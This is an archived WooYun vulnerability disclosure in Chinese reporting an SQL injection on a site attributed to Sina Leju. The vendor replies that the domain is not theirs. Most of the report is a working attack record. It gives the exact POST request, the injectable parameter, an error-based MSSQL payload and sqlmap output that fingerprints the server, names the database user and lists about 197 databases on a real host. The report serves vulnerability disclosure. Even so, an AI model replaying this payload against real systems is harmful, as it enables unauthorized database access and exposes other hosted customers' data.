破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

新浪乐居某系统存在SQL注入漏洞

编号219921
Urlhttp://www.wooyun.org/bug.php?action=view&id=219921
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题新浪乐居某系统存在SQL注入漏洞
漏洞类型SQL注射漏洞
厂商leju.com
白帽子路人甲
提交日期2016-06-16 17:16:00
公开日期2016-06-21 17:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
http://shleju.w114.mc-test.com/
漏洞细节

参数:xName

POST /xiangmulistview.aspx HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://shleju.w114.mc-test.com:80/
Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0z
Host: shleju.w114.mc-test.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
xName=1*

POC

sqlmap identified the following injection point(s) with a total of 208 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
current user: 'sq_yusuan'
current database: 'sq_yusuan'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
available databases [197]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sq_1252724821
[*] sq_464475463
[*] sq_a0910205251
[*] sq_abc20131113
[*] sq_afanyi2013
[*] sq_agarwood
[*] sq_aixiu8023
[*] sq_almono
[*] sq_anadolu
[*] sq_angoltech
[*] sq_baiyuyin
[*] sq_bh2345l
[*] sq_bjsbfcsq
[*] sq_bocetest
[*] sq_cake88zs
[*] sq_camming
[*] sq_ceob521m
[*] sq_ceshisql
[*] sq_cf7191810
[*] sq_changshi82
[*] sq_chsichsi
[*] sq_ckts2014
[*] sq_cl2013
[*] sq_cnwoods
[*] sq_comsite
[*] sq_cqvitdb
[*] sq_czcwan123
[*] sq_danson
[*] sq_daohang0808
[*] sq_dbdg2011
[*] sq_dborder
[*] sq_ding2013
[*] sq_duduge1
[*] sq_duomeicc
[*] sq_dydongrui1
[*] sq_eastlowe
[*] sq_eastvendor
[*] sq_egrets2000
[*] sq_eimshouse
[*] sq_EMeal08
[*] sq_erpcqwjfccn
[*] sq_fanyi021net
[*] sq_feiyuxiu
[*] sq_fjjyyw2013
[*] sq_fjslsp
[*] sq_forid317
[*] sq_forwardtoys
[*] sq_freedomx
[*] sq_fxy0831
[*] sq_fzgrcycom
[*] sq_fzhou223mssql
[*] sq_gkbbt2
[*] sq_globalshare
[*] sq_gywdhg
[*] sq_gzdycom
[*] sq_gzjspxw123
[*] sq_gzxinhaosi2
[*] sq_h18918960336
[*] sq_hanwei123
[*] sq_hlsyh520
[*] sq_hmddream
[*] sq_hnpgxh
[*] sq_hnswms
[*] sq_hongstar365
[*] sq_huadingit
[*] sq_huiyoush
[*] sq_hunnintu
[*] sq_hxlr2013
[*] sq_hymz888
[*] sq_iuiyiuiy2
[*] sq_jbb365
[*] sq_jiayi161
[*] sq_jinbo6211
[*] sq_jinriyuqid
[*] sq_jinrong0808
[*] sq_jixingbang
[*] sq_jqsy1718
[*] sq_jsgwyksw
[*] sq_jtwdfw
[*] sq_junweisiqwe
[*] sq_juyu2015
[*] sq_jxg1124
[*] sq_kezhang0808
[*] sq_kuer1002
[*] sq_lantolink
[*] sq_lawer360
[*] sq_layer100
[*] sq_liuyinyu
[*] sq_liuyong7520
[*] sq_ljstrb
[*] sq_longhuyi
[*] sq_lsvcom
[*] sq_lvegunet
[*] sq_lzncic
[*] sq_mrmf0001
[*] sq_mrzdh2233
[*] sq_mswh3way
[*] sq_muchendiban
[*] sq_myintersys
[*] sq_mytestdb
[*] sq_mywslw
[*] sq_nbyaocai123
[*] sq_newswap
[*] sq_nf888888
[*] sq_NJDT2015
[*] sq_ntim20130930
[*] sq_pailew
[*] sq_pingou
[*] sq_pjkc
[*] sq_ptsgxq
[*] sq_pxid2013
[*] sq_qest2013
[*] sq_qiaoyf
[*] sq_qichao3000
[*] sq_qiuh9208
[*] sq_qq1012647
[*] sq_qq503037121
[*] sq_qqqnweb
[*] sq_rongyou2014
[*] sq_shanghu2013
[*] sq_shazhongq
[*] sq_shboyon2
[*] sq_shchezhixiao
[*] sq_shdashequ
[*] sq_shengzhaobio
[*] sq_shiyin520
[*] sq_shjmkq2000
[*] sq_shkj140813
[*] sq_shkj150425
[*] sq_shkj150721
[*] sq_shkj151016
[*] sq_shkj151026
[*] sq_shkj151217
[*] sq_shkj160503
[*] sq_shkj160509
[*] sq_shkj160525
[*] sq_shkj160603
[*] sq_shujuguanli
[*] sq_shujuku2013
[*] sq_shyunwen20131
[*] sq_sinee2016
[*] sq_siteserver
[*] sq_sitytech2013
[*] sq_sql2000date
[*] sq_sql2000wd
[*] sq_sqltopcourage
[*] sq_ssdd2013
[*] sq_stgdsyxx
[*] sq_sunpcdb1
[*] sq_sunshine2
[*] sq_talentcorpdb1
[*] sq_tbcxmb
[*] sq_tcby002
[*] sq_tcdq1974
[*] sq_testlaskdjf
[*] sq_tger258369
[*] sq_tingyou123
[*] sq_ufolbb2013
[*] sq_ujoygroup
[*] sq_w123456
[*] sq_wczx98
[*] sq_web8980
[*] sq_wem520
[*] sq_wesleydata
[*] sq_wlcyjd
[*] sq_wxpneumdata
[*] sq_wyxfl1
[*] sq_x2013l
[*] sq_xad20140530
[*] sq_xdpc111
[*] sq_xifashui
[*] sq_xiqing3
[*] sq_xnkq2013
[*] sq_yachuan
[*] sq_yanglan21v
[*] sq_yangyang
[*] sq_yanvps
[*] sq_yczedu
[*] sq_yfplastic001
[*] sq_yuanbxjz
[*] sq_yuetong
[*] sq_yusuan
[*] sq_yuyue
[*] sq_yzspfx
[*] sq_zenrebrand
[*] sq_zhangma
[*] sq_zhuanyi1
[*] sq_zjp03701
[*] sq_zjtonglicom
[*] sq_zslpms13
[*] sq_zukexbaicai
[*] tempdb


1.png


2.png


3.png


4.png

修复方案

状态信息 2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-21 17:30
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

@新浪乐居 页面显示是新浪乐居的,不解。

暴走02016-06-17 09:39:00

你好,这个域名不是乐居的,谢谢关注

新浪乐居02016-06-17 09:19:00

ddd

answer02016-06-16 21:32:00

坐等忽略

nony02016-06-16 18:57:00